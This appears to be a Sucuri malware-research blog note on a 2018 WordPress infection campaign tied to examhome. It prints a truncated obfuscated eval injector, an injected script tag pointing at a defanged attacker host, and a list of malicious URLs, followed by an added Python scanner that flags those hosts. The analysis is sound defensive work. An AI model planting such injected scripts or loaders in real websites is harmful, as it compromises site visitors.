Sucuri Blog

Multi-Vector WordPress Infection from Examhome

September 18, 2018 | Denis Sinegubko

This September, we’ve been seeing a massive infection wave that injects malicious JavaScript code into .js and .php files and the WordPress database.

The script looks like this:

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101,...skipped... 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125))

Once decoded, the code injects scripts from hxxps://ads.voipnewswire[.]net/ad.js and later hxxps://examhome[.]net/stat.js?v=1.0.2. Some other related URLs are hxxps://cdn.allyouwant[.]online/main.js?t=c and hxxps://mp3menu[.]org/mp3.js.

Sometimes links to such scripts may be injected into wp_posts tables without any obfuscation whatsoever, e.g.

<script src='hxxps://cdn.examhome[.]net/cdn.js?ver=1.0.5' type='text/javascript'></script>

Many different attack vectors are being used in this campaign, and the location of the malware varies a lot. The more common versions of this malware can be found in .js files that have jquery in their names, or injected into the settings of vulnerable WordPress themes and plugins, for example very old tagDiv themes (Newspaper, Newsmag and their derivatives) or an unpatched Smart Google Code Inserter plugin.
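
For cleanup and triage, the two injection forms described above (the eval(String.fromCharCode(...)) wrapper and the plain script tag) can be checked statically. The following is an added example, not Sucuri's code or signature: it decodes char-code lists as data without running any JavaScript and flags the hosts named in this note. The function names and sample strings are constructed for illustration, and it expects a complete char-code list rather than the abbreviated one shown above.

```python
import re

# Hosts named in the note, stored defanged as written there and refanged for matching.
DEFANGED = ["ads.voipnewswire[.]net", "examhome[.]net",
            "cdn.allyouwant[.]online", "mp3menu[.]org"]
HOSTS = [h.replace("[.]", ".") for h in DEFANGED]

CHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)")
URL_HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+)", re.I)

def decode_charcodes(text):
    """Decode each String.fromCharCode(...) literal as data; no JavaScript is run."""
    decoded = []
    for m in CHARCODE_RE.finditer(text):
        codes = (int(n) for n in re.findall(r"\d+", m.group(1)))
        decoded.append("".join(chr(c) for c in codes if c < 0x110000))
    return decoded

def is_campaign_host(host):
    """Exact host or subdomain match, so look-alike names are not flagged."""
    host = host.lower().strip(".")
    return any(host == h or host.endswith("." + h) for h in HOSTS)

def scan(text):
    """Return sorted campaign hosts referenced in plain or char-code form."""
    found = set()
    for layer in [text] + decode_charcodes(text):
        for m in URL_HOST_RE.finditer(layer):
            if is_campaign_host(m.group(1)):
                found.add(m.group(1).lower().strip("."))
    return sorted(found)

# Constructed samples (not captured from an infected site).
SAMPLE_OBFUSCATED = "eval(String.fromCharCode(%s))" % ", ".join(
    str(ord(c)) for c in 'var u = "https://%s/stat.js";' % HOSTS[1])
SAMPLE_PLAIN = "<script src='https://cdn.%s/cdn.js?ver=1.0.5'></script>" % HOSTS[1]
SAMPLE_CLEAN = "<script src='https://example.org/js/jquery.min.js'></script>"

if __name__ == "__main__":
    for name in ("SAMPLE_OBFUSCATED", "SAMPLE_PLAIN", "SAMPLE_CLEAN"):
        print(name, scan(globals()[name]))
```

The same scan() can be run over the contents of .js and .php files and over exported wp_posts rows, since it only needs the text.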

Categories: Sucuri Labs, Website Malware Infections, WordPress Security
Tags: Labs Note, Malware

About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.
